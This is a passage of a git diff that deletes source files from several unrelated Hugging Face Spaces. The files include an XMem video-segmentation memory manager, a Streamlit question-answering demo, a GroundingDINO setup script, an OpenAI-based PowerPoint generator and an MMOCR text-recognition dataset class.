assert i in symbols, (group, norm_text, tokenized) - phone_len = len(phonemes) - word_len = len(group) - - aaa = distribute_phone(phone_len, word_len) - word2ph += aaa - - phs += phonemes - phones = ["_"] + phs + ["_"] - tones = [0 for i in phones] - word2ph = [1] + word2ph + [1] - return phones, tones, word2ph - - -if __name__ == "__main__": - tokenizer = AutoTokenizer.from_pretrained("./bert/bert-base-japanese-v3") - text = "hello,こんにちは、世界!……" - from text.japanese_bert import get_bert_feature - - text = text_normalize(text) - print(text) - phones, tones, word2ph = g2p(text) - bert = get_bert_feature(text, word2ph) - - print(phones, tones, word2ph, bert.shape) diff --git a/spaces/Make-A-Protagonist/Make-A-Protagonist-inference/Make-A-Protagonist/experts/XMem/inference/memory_manager.py b/spaces/Make-A-Protagonist/Make-A-Protagonist-inference/Make-A-Protagonist/experts/XMem/inference/memory_manager.py deleted file mode 100644 index abae24349cb61b4e7e07588375a409254302ab08..0000000000000000000000000000000000000000 --- a/spaces/Make-A-Protagonist/Make-A-Protagonist-inference/Make-A-Protagonist/experts/XMem/inference/memory_manager.py +++ /dev/null @@ -1,284 +0,0 @@ -import torch -import warnings - -from XMem.inference.kv_memory_store import KeyValueMemoryStore -from XMem.model.memory_util import * - - -class MemoryManager: - """ - Manages all three memory stores and the transition between working/long-term memory - """ - def __init__(self, config): - self.hidden_dim = config['hidden_dim'] - self.top_k = config['top_k'] - - self.enable_long_term = config['enable_long_term'] - self.enable_long_term_usage = config['enable_long_term_count_usage'] - if self.enable_long_term: - self.max_mt_frames = config['max_mid_term_frames'] - self.min_mt_frames = config['min_mid_term_frames'] - self.num_prototypes = config['num_prototypes'] - self.max_long_elements = config['max_long_term_elements'] - - # dimensions will be inferred from input later - self.CK = self.CV = None - self.H 
= self.W = None - - # The hidden state will be stored in a single tensor for all objects - # B x num_objects x CH x H x W - self.hidden = None - - self.work_mem = KeyValueMemoryStore(count_usage=self.enable_long_term) - if self.enable_long_term: - self.long_mem = KeyValueMemoryStore(count_usage=self.enable_long_term_usage) - - self.reset_config = True - - def update_config(self, config): - self.reset_config = True - self.hidden_dim = config['hidden_dim'] - self.top_k = config['top_k'] - - assert self.enable_long_term == config['enable_long_term'], 'cannot update this' - assert self.enable_long_term_usage == config['enable_long_term_count_usage'], 'cannot update this' - - self.enable_long_term_usage = config['enable_long_term_count_usage'] - if self.enable_long_term: - self.max_mt_frames = config['max_mid_term_frames'] - self.min_mt_frames = config['min_mid_term_frames'] - self.num_prototypes = config['num_prototypes'] - self.max_long_elements = config['max_long_term_elements'] - - def _readout(self, affinity, v): - # this function is for a single object group - return v @ affinity - - def match_memory(self, query_key, selection): - # query_key: B x C^k x H x W - # selection: B x C^k x H x W - num_groups = self.work_mem.num_groups - h, w = query_key.shape[-2:] - - query_key = query_key.flatten(start_dim=2) - selection = selection.flatten(start_dim=2) if selection is not None else None - - """ - Memory readout using keys - """ - - if self.enable_long_term and self.long_mem.engaged(): - # Use long-term memory - long_mem_size = self.long_mem.size - memory_key = torch.cat([self.long_mem.key, self.work_mem.key], -1) - shrinkage = torch.cat([self.long_mem.shrinkage, self.work_mem.shrinkage], -1) - - similarity = get_similarity(memory_key, shrinkage, query_key, selection) - work_mem_similarity = similarity[:, long_mem_size:] - long_mem_similarity = similarity[:, :long_mem_size] - - # get the usage with the first group - # the first group always have all the keys valid - 
affinity, usage = do_softmax( - torch.cat([long_mem_similarity[:, -self.long_mem.get_v_size(0):], work_mem_similarity], 1), - top_k=self.top_k, inplace=True, return_usage=True) - affinity = [affinity] - - # compute affinity group by group as later groups only have a subset of keys - for gi in range(1, num_groups): - if gi < self.long_mem.num_groups: - # merge working and lt similarities before softmax - affinity_one_group = do_softmax( - torch.cat([long_mem_similarity[:, -self.long_mem.get_v_size(gi):], - work_mem_similarity[:, -self.work_mem.get_v_size(gi):]], 1), - top_k=self.top_k, inplace=True) - else: - # no long-term memory for this group - affinity_one_group = do_softmax(work_mem_similarity[:, -self.work_mem.get_v_size(gi):], - top_k=self.top_k, inplace=(gi==num_groups-1)) - affinity.append(affinity_one_group) - - all_memory_value = [] - for gi, gv in enumerate(self.work_mem.value): - # merge the working and lt values before readout - if gi < self.long_mem.num_groups: - all_memory_value.append(torch.cat([self.long_mem.value[gi], self.work_mem.value[gi]], -1)) - else: - all_memory_value.append(gv) - - """ - Record memory usage for working and long-term memory - """ - # ignore the index return for long-term memory - work_usage = usage[:, long_mem_size:] - self.work_mem.update_usage(work_usage.flatten()) - - if self.enable_long_term_usage: - # ignore the index return for working memory - long_usage = usage[:, :long_mem_size] - self.long_mem.update_usage(long_usage.flatten()) - else: - # No long-term memory - similarity = get_similarity(self.work_mem.key, self.work_mem.shrinkage, query_key, selection) - - if self.enable_long_term: - affinity, usage = do_softmax(similarity, inplace=(num_groups==1), - top_k=self.top_k, return_usage=True) - - # Record memory usage for working memory - self.work_mem.update_usage(usage.flatten()) - else: - affinity = do_softmax(similarity, inplace=(num_groups==1), - top_k=self.top_k, return_usage=False) - - affinity = [affinity] - - 
# compute affinity group by group as later groups only have a subset of keys - for gi in range(1, num_groups): - affinity_one_group = do_softmax(similarity[:, -self.work_mem.get_v_size(gi):], - top_k=self.top_k, inplace=(gi==num_groups-1)) - affinity.append(affinity_one_group) - - all_memory_value = self.work_mem.value - - # Shared affinity within each group - all_readout_mem = torch.cat([ - self._readout(affinity[gi], gv) - for gi, gv in enumerate(all_memory_value) - ], 0) - - return all_readout_mem.view(all_readout_mem.shape[0], self.CV, h, w) - - def add_memory(self, key, shrinkage, value, objects, selection=None): - # key: 1*C*H*W - # value: 1*num_objects*C*H*W - # objects contain a list of object indices - if self.H is None or self.reset_config: - self.reset_config = False - self.H, self.W = key.shape[-2:] - self.HW = self.H*self.W - if self.enable_long_term: - # convert from num. frames to num. nodes - self.min_work_elements = self.min_mt_frames*self.HW - self.max_work_elements = self.max_mt_frames*self.HW - - # key: 1*C*N - # value: num_objects*C*N - key = key.flatten(start_dim=2) - shrinkage = shrinkage.flatten(start_dim=2) - value = value[0].flatten(start_dim=2) - - self.CK = key.shape[1] - self.CV = value.shape[1] - - if selection is not None: - if not self.enable_long_term: - warnings.warn('the selection factor is only needed in long-term mode', UserWarning) - selection = selection.flatten(start_dim=2) - - self.work_mem.add(key, value, shrinkage, selection, objects) - - # long-term memory cleanup - if self.enable_long_term: - # Do memory compressed if needed - if self.work_mem.size >= self.max_work_elements: - # Remove obsolete features if needed - if self.long_mem.size >= (self.max_long_elements-self.num_prototypes): - self.long_mem.remove_obsolete_features(self.max_long_elements-self.num_prototypes) - - self.compress_features() - - - def create_hidden_state(self, n, sample_key): - # n is the TOTAL number of objects - h, w = sample_key.shape[-2:] - if 
self.hidden is None: - self.hidden = torch.zeros((1, n, self.hidden_dim, h, w), device=sample_key.device) - elif self.hidden.shape[1] != n: - self.hidden = torch.cat([ - self.hidden, - torch.zeros((1, n-self.hidden.shape[1], self.hidden_dim, h, w), device=sample_key.device) - ], 1) - - assert(self.hidden.shape[1] == n) - - def set_hidden(self, hidden): - self.hidden = hidden - - def get_hidden(self): - return self.hidden - - def compress_features(self): - HW = self.HW - candidate_value = [] - total_work_mem_size = self.work_mem.size - for gv in self.work_mem.value: - # Some object groups might be added later in the video - # So not all keys have values associated with all objects - # We need to keep track of the key->value validity - mem_size_in_this_group = gv.shape[-1] - if mem_size_in_this_group == total_work_mem_size: - # full LT - candidate_value.append(gv[:,:,HW:-self.min_work_elements+HW]) - else: - # mem_size is smaller than total_work_mem_size, but at least HW - assert HW <= mem_size_in_this_group < total_work_mem_size - if mem_size_in_this_group > self.min_work_elements+HW: - # part of this object group still goes into LT - candidate_value.append(gv[:,:,HW:-self.min_work_elements+HW]) - else: - # this object group cannot go to the LT at all - candidate_value.append(None) - - # perform memory consolidation - prototype_key, prototype_value, prototype_shrinkage = self.consolidation( - *self.work_mem.get_all_sliced(HW, -self.min_work_elements+HW), candidate_value) - - # remove consolidated working memory - self.work_mem.sieve_by_range(HW, -self.min_work_elements+HW, min_size=self.min_work_elements+HW) - - # add to long-term memory - self.long_mem.add(prototype_key, prototype_value, prototype_shrinkage, selection=None, objects=None) - - def consolidation(self, candidate_key, candidate_shrinkage, candidate_selection, usage, candidate_value): - # keys: 1*C*N - # values: num_objects*C*N - N = candidate_key.shape[-1] - - # find the indices with max usage - _, 
max_usage_indices = torch.topk(usage, k=self.num_prototypes, dim=-1, sorted=True) - prototype_indices = max_usage_indices.flatten() - - # Prototypes are invalid for out-of-bound groups - validity = [prototype_indices >= (N-gv.shape[2]) if gv is not None else None for gv in candidate_value] - - prototype_key = candidate_key[:, :, prototype_indices] - prototype_selection = candidate_selection[:, :, prototype_indices] if candidate_selection is not None else None - - """ - Potentiation step - """ - similarity = get_similarity(candidate_key, candidate_shrinkage, prototype_key, prototype_selection) - - # convert similarity to affinity - # need to do it group by group since the softmax normalization would be different - affinity = [ - do_softmax(similarity[:, -gv.shape[2]:, validity[gi]]) if gv is not None else None - for gi, gv in enumerate(candidate_value) - ] - - # some values can have all-False validity; weed them out - affinity = [ - aff if aff is None or aff.shape[-1] > 0 else None for aff in affinity - ] - - # readout the values - prototype_value = [ - self._readout(affinity[gi], gv) if affinity[gi] is not None else None - for gi, gv in enumerate(candidate_value) - ] - - # readout the shrinkage term - prototype_shrinkage = self._readout(affinity[0], candidate_shrinkage) if candidate_shrinkage is not None else None - - return prototype_key, prototype_value, prototype_shrinkage diff --git a/spaces/Martin1998/question_answering/app.py b/spaces/Martin1998/question_answering/app.py deleted file mode 100644 index f3aead718dde376967044c3a2d48aeb8cc62d2ab..0000000000000000000000000000000000000000 --- a/spaces/Martin1998/question_answering/app.py +++ /dev/null @@ -1,45 +0,0 @@ -import streamlit as st -import re - -from transformers import pipeline - - - -st.title("Question - Answering AI App") -st.write("---") -st.write("### Give Content to the AI and quiz it based on the content.") -st.warning("**Powered by AI Language Models...**") - -st.write("---") - -content = 
st.text_area("Paste your content here...", height=200) - -words = len(re.findall(r'\w+', content)) -st.write("**Number of words in Content is :**", words) - -text = st.text_area("Ask Question here...") - - -st.write("---") - -if st.button("Generate Answer"): - - if words == 0: - - st.write("### Please! Paste Content into input bar.") - - else: - - qa = pipeline("question-answering") - - response = qa( - question = text, - - context= content - ) - - st.info(response['answer']) - -st.write("---") - -st.write("### How was the response???") \ No newline at end of file diff --git a/spaces/Mashir0/pximg/Dockerfile b/spaces/Mashir0/pximg/Dockerfile deleted file mode 100644 index 483ca4ffe3885adae99446fc81f6102c909f3e98..0000000000000000000000000000000000000000 --- a/spaces/Mashir0/pximg/Dockerfile +++ /dev/null @@ -1,10 +0,0 @@ -# syntax=docker/dockerfile:1 - -FROM node:16-alpine - -WORKDIR /app -COPY . . - -RUN yarn install --production - -CMD ["yarn", "start"] diff --git a/spaces/Mellow-ai/PhotoAI_Mellow/rembg/sessions/dis.py b/spaces/Mellow-ai/PhotoAI_Mellow/rembg/sessions/dis.py deleted file mode 100644 index 2f3b849a2b0390a1c4f3f161307d1f1001d22938..0000000000000000000000000000000000000000 --- a/spaces/Mellow-ai/PhotoAI_Mellow/rembg/sessions/dis.py +++ /dev/null @@ -1,47 +0,0 @@ -import os -from typing import List - -import numpy as np -import pooch -from PIL import Image -from PIL.Image import Image as PILImage - -from .base import BaseSession - - -class DisSession(BaseSession): - def predict(self, img: PILImage, *args, **kwargs) -> List[PILImage]: - ort_outs = self.inner_session.run( - None, - self.normalize(img, (0.485, 0.456, 0.406), (1.0, 1.0, 1.0), (1024, 1024)), - ) - - pred = ort_outs[0][:, 0, :, :] - - ma = np.max(pred) - mi = np.min(pred) - - pred = (pred - mi) / (ma - mi) - pred = np.squeeze(pred) - - mask = Image.fromarray((pred * 255).astype("uint8"), mode="L") - mask = mask.resize(img.size, Image.LANCZOS) - - return [mask] - - @classmethod - def 
download_models(cls, *args, **kwargs): - fname = f"{cls.name()}.onnx" - pooch.retrieve( - "https://github.com/danielgatis/rembg/releases/download/v0.0.0/isnet-general-use.onnx", - "md5:fc16ebd8b0c10d971d3513d564d01e29", - fname=fname, - path=cls.u2net_home(), - progressbar=True, - ) - - return os.path.join(cls.u2net_home(), fname) - - @classmethod - def name(cls, *args, **kwargs): - return "isnet-general-use" diff --git a/spaces/MingGatsby/Grounding_DINO_demo/setup.py b/spaces/MingGatsby/Grounding_DINO_demo/setup.py deleted file mode 100644 index a045b763fb4a4f61bac23b735544a18ffc68d20a..0000000000000000000000000000000000000000 --- a/spaces/MingGatsby/Grounding_DINO_demo/setup.py +++ /dev/null @@ -1,208 +0,0 @@ -# coding=utf-8 -# Copyright 2022 The IDEA Authors. All rights reserved. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. 
-# ------------------------------------------------------------------------------------------------ -# Modified from -# https://github.com/fundamentalvision/Deformable-DETR/blob/main/models/ops/setup.py -# https://github.com/facebookresearch/detectron2/blob/main/setup.py -# https://github.com/open-mmlab/mmdetection/blob/master/setup.py -# https://github.com/Oneflow-Inc/libai/blob/main/setup.py -# ------------------------------------------------------------------------------------------------ - -import glob -import os -import subprocess - -import torch -from setuptools import find_packages, setup -from torch.utils.cpp_extension import CUDA_HOME, CppExtension, CUDAExtension - -# groundingdino version info -version = "0.1.0" -package_name = "groundingdino" -cwd = os.path.dirname(os.path.abspath(__file__)) - - -sha = "Unknown" -try: - sha = subprocess.check_output(["git", "rev-parse", "HEAD"], cwd=cwd).decode("ascii").strip() -except Exception: - pass - - -def write_version_file(): - version_path = os.path.join(cwd, "groundingdino", "version.py") - with open(version_path, "w") as f: - f.write(f"__version__ = '{version}'\n") - # f.write(f"git_version = {repr(sha)}\n") - - -requirements = ["torch", "torchvision"] - -torch_ver = [int(x) for x in torch.__version__.split(".")[:2]] - - -def get_extensions(): - this_dir = os.path.dirname(os.path.abspath(__file__)) - extensions_dir = os.path.join(this_dir, "groundingdino", "models", "GroundingDINO", "csrc") - - main_source = os.path.join(extensions_dir, "vision.cpp") - sources = glob.glob(os.path.join(extensions_dir, "**", "*.cpp")) - source_cuda = glob.glob(os.path.join(extensions_dir, "**", "*.cu")) + glob.glob( - os.path.join(extensions_dir, "*.cu") - ) - - sources = [main_source] + sources - - extension = CppExtension - - extra_compile_args = {"cxx": []} - define_macros = [] - - if torch.cuda.is_available() and CUDA_HOME is not None: - print("Compiling with CUDA") - extension = CUDAExtension - sources += source_cuda - 
define_macros += [("WITH_CUDA", None)] - extra_compile_args["nvcc"] = [ - "-DCUDA_HAS_FP16=1", - "-D__CUDA_NO_HALF_OPERATORS__", - "-D__CUDA_NO_HALF_CONVERSIONS__", - "-D__CUDA_NO_HALF2_OPERATORS__", - ] - else: - print("Compiling without CUDA") - define_macros += [("WITH_HIP", None)] - extra_compile_args["nvcc"] = [] - return None - - sources = [os.path.join(extensions_dir, s) for s in sources] - include_dirs = [extensions_dir] - - ext_modules = [ - extension( - "groundingdino._C", - sources, - include_dirs=include_dirs, - define_macros=define_macros, - extra_compile_args=extra_compile_args, - ) - ] - - return ext_modules - - -def parse_requirements(fname="requirements.txt", with_version=True): - """Parse the package dependencies listed in a requirements file but strips - specific versioning information. - - Args: - fname (str): path to requirements file - with_version (bool, default=False): if True include version specs - - Returns: - List[str]: list of requirements items - - CommandLine: - python -c "import setup; print(setup.parse_requirements())" - """ - import re - import sys - from os.path import exists - - require_fpath = fname - - def parse_line(line): - """Parse information from a line in a requirements text file.""" - if line.startswith("-r "): - # Allow specifying requirements in other files - target = line.split(" ")[1] - for info in parse_require_file(target): - yield info - else: - info = {"line": line} - if line.startswith("-e "): - info["package"] = line.split("#egg=")[1] - elif "@git+" in line: - info["package"] = line - else: - # Remove versioning from the package - pat = "(" + "|".join([">=", "==", ">"]) + ")" - parts = re.split(pat, line, maxsplit=1) - parts = [p.strip() for p in parts] - - info["package"] = parts[0] - if len(parts) > 1: - op, rest = parts[1:] - if ";" in rest: - # Handle platform specific dependencies - # http://setuptools.readthedocs.io/en/latest/setuptools.html#declaring-platform-specific-dependencies - version, 
platform_deps = map(str.strip, rest.split(";")) - info["platform_deps"] = platform_deps - else: - version = rest # NOQA - info["version"] = (op, version) - yield info - - def parse_require_file(fpath): - with open(fpath, "r") as f: - for line in f.readlines(): - line = line.strip() - if line and not line.startswith("#"): - for info in parse_line(line): - yield info - - def gen_packages_items(): - if exists(require_fpath): - for info in parse_require_file(require_fpath): - parts = [info["package"]] - if with_version and "version" in info: - parts.extend(info["version"]) - if not sys.version.startswith("3.4"): - # apparently package_deps are broken in 3.4 - platform_deps = info.get("platform_deps") - if platform_deps is not None: - parts.append(";" + platform_deps) - item = "".join(parts) - yield item - - packages = list(gen_packages_items()) - return packages - - -if __name__ == "__main__": - print(f"Building wheel {package_name}-{version}") - - with open("LICENSE", "r", encoding="utf-8") as f: - license = f.read() - - write_version_file() - - setup( - name="groundingdino", - version="0.1.0", - author="International Digital Economy Academy, Shilong Liu", - url="https://github.com/IDEA-Research/GroundingDINO", - description="open-set object detector", - license=license, - install_requires=parse_requirements("requirements.txt"), - packages=find_packages( - exclude=( - "configs", - "tests", - ) - ), - ext_modules=get_extensions(), - cmdclass={"build_ext": torch.utils.cpp_extension.BuildExtension}, - ) diff --git a/spaces/MinzChan/ChatGPT-PPT-Generate-With-Azure-OpenAI-API/app.py b/spaces/MinzChan/ChatGPT-PPT-Generate-With-Azure-OpenAI-API/app.py deleted file mode 100644 index 59bc948451d17de6add72192b9e36c6f18df4d44..0000000000000000000000000000000000000000 --- a/spaces/MinzChan/ChatGPT-PPT-Generate-With-Azure-OpenAI-API/app.py +++ /dev/null @@ -1,259 +0,0 @@ -import glob -import os -import random -import re -import string - -import gradio as gr - -import openai -from 
icrawler import ImageDownloader -from icrawler.builtin import GoogleImageCrawler, BingImageCrawler -from uuid import uuid4 -from pptx import Presentation - -bad_coding_practice = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) for _ in - range(16)) - - -def refresh_bad_coding_practice(): - global bad_coding_practice - bad_coding_practice = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) - for _ in range(16)) - return - - -class PrefixNameDownloader(ImageDownloader): - - def get_filename(self, task, default_ext): - filename = super(PrefixNameDownloader, self).get_filename( - task, default_ext) - print(bad_coding_practice) - return 'prefix_' + bad_coding_practice + filename - - -def generate_ppt(file, topic, slide_length, api_type, api_base, api_version, api_key): - print(file.name) - - root = Presentation(file.name) - - openai.api_type = api_type - openai.api_base = api_base - openai.api_version = api_version - openai.api_key = api_key - - message = f""" - Create content for a slideshow presentation. - The content's topic is {topic}. - The slideshow is {slide_length} slides long. - The content is written in the language of the content I give you above. - - - You are allowed to use the following slide types: - - Slide types: - Title Slide - (Title, Subtitle) - Content Slide - (Title, Content) - Image Slide - (Title, Content, Image) - Thanks Slide - (Title) - - Put this tag before the Title Slide: [L_TS] - Put this tag before the Content Slide: [L_CS] - Put this tag before the Image Slide: [L_IS] - Put this tag before the Thanks Slide: [L_THS] - - Put "[SLIDEBREAK]" after each slide - - For example: - [L_TS] - [TITLE]Mental Health[/TITLE] - - [SLIDEBREAK] - - [L_CS] - [TITLE]Mental Health Definition[/TITLE] - [CONTENT] - 1. Definition: A person’s condition with regard to their psychological and emotional well-being - 2. Can impact one's physical health - 3. Stigmatized too often. 
- [/CONTENT] - - [SLIDEBREAK] - - Put this tag before the Title: [TITLE] - Put this tag after the Title: [/TITLE] - Put this tag before the Subtitle: [SUBTITLE] - Put this tag after the Subtitle: [/SUBTITLE] - Put this tag before the Content: [CONTENT] - Put this tag after the Content: [/CONTENT] - Put this tag before the Image: [IMAGE] - Put this tag after the Image: [/IMAGE] - - Elaborate on the Content, provide as much information as possible. - You put a [/CONTENT] at the end of the Content. - Do not reply as if you are talking about the slideshow itself. (ex. "Include pictures here about...") - Do not include any special characters (?, !, ., :, ) in the Title. - Do not include any additional information in your response and stick to the format.""" - - if api_type in ("azure", "azure_ad", "azuread"): - response = openai.ChatCompletion.create( - engine="GPT-35-Turbo", - messages=[ - {"role": "user", "content": message} - ] - ) - else: - response = openai.ChatCompletion.create( - model="gpt-3.5-turbo", - messages=[ - {"role": "user", "content": message} - ] - ) - - # """ Ref for slide types: - # 0 -> title and subtitle - # 1 -> title and content - # 2 -> section header - # 3 -> two content - # 4 -> Comparison - # 5 -> Title only - # 6 -> Blank - # 7 -> Content with caption - # 8 -> Pic with caption - # """ - - def delete_all_slides(): - for i in range(len(root.slides) - 1, -1, -1): - r_id = root.slides._sldIdLst[i].rId - root.part.drop_rel(r_id) - del root.slides._sldIdLst[i] - - def create_title_slide(title, subtitle): - layout = root.slide_layouts[0] - slide = root.slides.add_slide(layout) - slide.shapes.title.text = title - slide.placeholders[1].text = subtitle - - def create_section_header_slide(title): - layout = root.slide_layouts[2] - slide = root.slides.add_slide(layout) - slide.shapes.title.text = title - - def create_title_and_content_slide(title, content): - layout = root.slide_layouts[1] - slide = root.slides.add_slide(layout) - slide.shapes.title.text 
= title - slide.placeholders[1].text = content - - def create_title_and_content_and_image_slide(title, content, image_query): - layout = root.slide_layouts[8] - slide = root.slides.add_slide(layout) - slide.shapes.title.text = title - slide.placeholders[2].text = content - refresh_bad_coding_practice() - bing_crawler = GoogleImageCrawler(downloader_cls=PrefixNameDownloader, storage={'root_dir': os.getcwd()}) - bing_crawler.crawl(keyword=image_query, max_num=1) - dir_path = os.path.dirname(os.path.realpath(__file__)) - file_name = glob.glob(f"prefix_{bad_coding_practice}*") - print(file_name) - img_path = os.path.join(dir_path, file_name[0]) - slide.shapes.add_picture(img_path, slide.placeholders[1].left, slide.placeholders[1].top, - slide.placeholders[1].width, slide.placeholders[1].height) - - def find_text_in_between_tags(text, start_tag, end_tag): - start_pos = text.find(start_tag) - end_pos = text.find(end_tag) - result = [] - while start_pos > -1 and end_pos > -1: - text_between_tags = text[start_pos + len(start_tag):end_pos] - result.append(text_between_tags) - start_pos = text.find(start_tag, end_pos + len(end_tag)) - end_pos = text.find(end_tag, start_pos) - res1 = "".join(result) - res2 = re.sub(r"\[IMAGE\].*?\[/IMAGE\]", '', res1) - if len(result) > 0: - return res2 - else: - return "" - - def search_for_slide_type(text): - tags = ["[L_TS]", "[L_CS]", "[L_IS]", "[L_THS]"] - found_text = next((s for s in tags if s in text), None) - return found_text - - def parse_response(reply): - list_of_slides = reply.split("[SLIDEBREAK]") - for slide in list_of_slides: - slide_type = search_for_slide_type(slide) - if slide_type == "[L_TS]": - create_title_slide(find_text_in_between_tags(str(slide), "[TITLE]", "[/TITLE]"), - find_text_in_between_tags(str(slide), "[SUBTITLE]", "[/SUBTITLE]")) - elif slide_type == "[L_CS]": - create_title_and_content_slide("".join(find_text_in_between_tags(str(slide), "[TITLE]", "[/TITLE]")), - 
"".join(find_text_in_between_tags(str(slide), "[CONTENT]", - "[/CONTENT]"))) - elif slide_type == "[L_IS]": - create_title_and_content_and_image_slide("".join(find_text_in_between_tags(str(slide), "[TITLE]", - "[/TITLE]")), - "".join(find_text_in_between_tags(str(slide), "[CONTENT]", - "[/CONTENT]")), - "".join(find_text_in_between_tags(str(slide), "[IMAGE]", - "[/IMAGE]"))) - elif slide_type == "[L_THS]": - create_section_header_slide("".join(find_text_in_between_tags(str(slide), "[TITLE]", "[/TITLE]"))) - - def find_title(): - return root.slides[0].shapes.title.text - - delete_all_slides() - - print(response) - - parse_response(response['choices'][0]['message']['content']) - - name_ = str(uuid4()).replace('-', '') - - root.save(f"./{name_}.pptx") - - print("done") - - dir_path = "./" - prefix = "prefix_" - - for file_name in os.listdir(dir_path): - if file_name.startswith(prefix): - file_path = os.path.join(dir_path, file_name) - if os.path.isfile(file_path): - os.remove(file_path) - - return f"./{name_}.pptx" - - -with gr.Blocks(title="ChatGPT PPT框架生成") as demo: - gr.Markdown("""

    ChatGPT PPT Outline Generator

    """) - with gr.Row(): - with gr.Column(): - openai_type = gr.Textbox(label="OpenAI API Type", placeholder="azure,azure_ad and azuread for Azure OpenAI, open_ai for OpenAI official", value="azure") - openai_base = gr.Textbox(label="OpenAI API Base", placeholder="https://xxx.openai.azure.com/ for Azure OpenAI, https://api.openai.com/v1 for OpenAI official", value="https://xxx.openai.azure.com/") - openai_version = gr.Textbox(label="OpenAI API Version", value="2023-03-15-preview") - openai_token = gr.Textbox(label="OpenAI API Key", placeholder="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx for Azure OpenAI, sk-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx for OpenAI official",) - topic = gr.Textbox(label="PPT的主题或内容") - length = gr.Slider(minimum=1, maximum=50, value=6, label="生成的PPT页数", step=1) - theme = gr.File(value="./theme.pptx", file_types=['pptx', 'ppt'], label="PPT模版") - output_file = gr.File(interactive=False) - - topic.submit( - fn=generate_ppt, - inputs=[theme, topic, length, openai_type, openai_base, openai_version, openai_token], - outputs=[output_file] - ) - - submit = gr.Button("生成") - submit.click( - fn=generate_ppt, - inputs=[theme, topic, length, openai_type, openai_base, openai_version, openai_token], - outputs=[output_file] - ) - -if __name__ == "__main__": - demo.launch() diff --git a/spaces/Mountchicken/MAERec-Gradio/mmocr/datasets/recog_text_dataset.py b/spaces/Mountchicken/MAERec-Gradio/mmocr/datasets/recog_text_dataset.py deleted file mode 100644 index 25cc54ff8e3639fc5a3ba3182749d0920bfc0a8b..0000000000000000000000000000000000000000 --- a/spaces/Mountchicken/MAERec-Gradio/mmocr/datasets/recog_text_dataset.py +++ /dev/null @@ -1,134 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. 
-import os.path as osp -from typing import Callable, List, Optional, Sequence, Union - -from mmengine.dataset import BaseDataset -from mmengine.fileio import list_from_file - -from mmocr.registry import DATASETS, TASK_UTILS - - -@DATASETS.register_module() -class RecogTextDataset(BaseDataset): - r"""RecogTextDataset for text recognition. - - The annotation file can be in either jsonl or txt format. If the annotation - file is in jsonl format, it should be a list of dicts. If the annotation - file is in txt format, it should be a list of lines. - - The annotation formats are shown as follows. - - txt format - .. code-block:: none - - ``test_img1.jpg OpenMMLab`` - ``test_img2.jpg MMOCR`` - - - jsonl format - .. code-block:: none - - ``{"filename": "test_img1.jpg", "text": "OpenMMLab"}`` - ``{"filename": "test_img2.jpg", "text": "MMOCR"}`` - - Args: - ann_file (str): Annotation file path. Defaults to ''. - backend_args (dict, optional): Arguments to instantiate the - corresponding backend of the uri prefix. Defaults to None. - parser_cfg (dict, optional): Config of the parser for parsing annotations. - Use ``LineJsonParser`` when the annotation file is in jsonl format - with keys of ``filename`` and ``text``. The keys in parser_cfg - should be consistent with the keys in the jsonl annotations. The first - key in parser_cfg should be the key of the path in the jsonl - annotations. The second key in parser_cfg should be the key of the - text in the jsonl. Use ``LineStrParser`` when the annotation file is in - txt format. Defaults to - ``dict(type='LineJsonParser', keys=['filename', 'text'])``. - metainfo (dict, optional): Meta information for the dataset, such as class - information. Defaults to None. - data_root (str): The root directory for ``data_prefix`` and - ``ann_file``. Defaults to ''. - data_prefix (dict): Prefix for training data. Defaults to - ``dict(img_path='')``. - filter_cfg (dict, optional): Config for filtering data. Defaults to None. 
- indices (int or Sequence[int], optional): Support using only the first few - entries in the annotation file to facilitate training/testing on a smaller - dataset. Defaults to None, which means using all ``data_infos``. - serialize_data (bool, optional): Whether to hold memory using - serialized objects; when enabled, data loader workers can use - shared RAM from the master process instead of making a copy. Defaults - to True. - pipeline (list, optional): Processing pipeline. Defaults to []. - test_mode (bool, optional): ``test_mode=True`` means in test phase. - Defaults to False. - lazy_init (bool, optional): Whether to defer loading annotations at - instantiation. In some cases, such as visualization, only the meta - information of the dataset is needed, so it is not necessary to - load the annotation file. ``RecogTextDataset`` can skip loading - annotations to save time by setting ``lazy_init=True``. Defaults to - False. - max_refetch (int, optional): If ``RecogTextDataset.prepare_data`` gets a - None image, the maximum extra number of cycles to get a valid - image. Defaults to 1000. 
- """ - - def __init__(self, - ann_file: str = '', - backend_args=None, - parser_cfg: Optional[dict] = dict( - type='LineJsonParser', keys=['filename', 'text']), - metainfo: Optional[dict] = None, - data_root: Optional[str] = '', - data_prefix: dict = dict(img_path=''), - filter_cfg: Optional[dict] = None, - indices: Optional[Union[int, Sequence[int]]] = None, - serialize_data: bool = True, - pipeline: List[Union[dict, Callable]] = [], - test_mode: bool = False, - lazy_init: bool = False, - max_refetch: int = 1000) -> None: - - self.parser = TASK_UTILS.build(parser_cfg) - self.backend_args = backend_args - super().__init__( - ann_file=ann_file, - metainfo=metainfo, - data_root=data_root, - data_prefix=data_prefix, - filter_cfg=filter_cfg, - indices=indices, - serialize_data=serialize_data, - pipeline=pipeline, - test_mode=test_mode, - lazy_init=lazy_init, - max_refetch=max_refetch) - - def load_data_list(self) -> List[dict]: - """Load annotations from an annotation file named as ``self.ann_file`` - - Returns: - List[dict]: A list of annotation. - """ - data_list = [] - raw_anno_infos = list_from_file( - self.ann_file, backend_args=self.backend_args) - for raw_anno_info in raw_anno_infos: - data_list.append(self.parse_data_info(raw_anno_info)) - return data_list - - def parse_data_info(self, raw_anno_info: str) -> dict: - """Parse raw annotation to target format. - - Args: - raw_anno_info (str): One raw data information loaded - from ``ann_file``. - - Returns: - (dict): Parsed annotation. 
